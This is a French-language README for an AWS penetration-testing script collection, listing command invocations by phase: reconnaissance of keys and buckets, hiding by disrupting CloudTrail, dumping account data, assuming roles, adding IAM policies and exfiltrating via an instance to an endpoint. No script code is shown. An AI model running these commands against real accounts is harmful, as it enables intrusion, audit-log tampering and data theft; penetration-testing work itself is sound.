
Une collection de bric-à-brac pour tests de pénétration AWS
Ceci est une collection de scripts horriblement écrits pour effectuer diverses tâches liées aux tests de pénétration AWS. Ne sois pas triste si ça ne fonctionne pas pour toi. Il se peut qu'AWS ait changé depuis la création d'un outil donné, ou que le code soit mauvais. Dans tous les cas, n'hésite pas à contribuer.
La plupart de ces trucs ont été écrits par Daniel Grzelak, mais il y a eu de nombreuses contributions, notamment de Mike Fuller.
pip install -r requirements.txt
Assure-toi également de configurer tes identifiants AWS dans ~/.aws/credentials.
Choses à faire pour la collecte d'informations avant compromission.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
Choses qui t'aideront à prendre pied dans un compte.
Choses qui peuvent t'aider à rester caché après avoir compromis un compte.
./disrupt_cloudtrail.py -s
Choses pour t'aider à comprendre ce que tu as compromis.
./dump_account_data.sh /tmp/
Choses pour t'aider à te déplacer dans un compte et à collecter différents niveaux d'accès.
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
Choses pour t'aider à maintenir ton accès à un compte.
Choses pour t'aider à extraire et déplacer des données dans AWS.
Autres choses que j'étais soit trop stupide soit trop paresseux pour classer.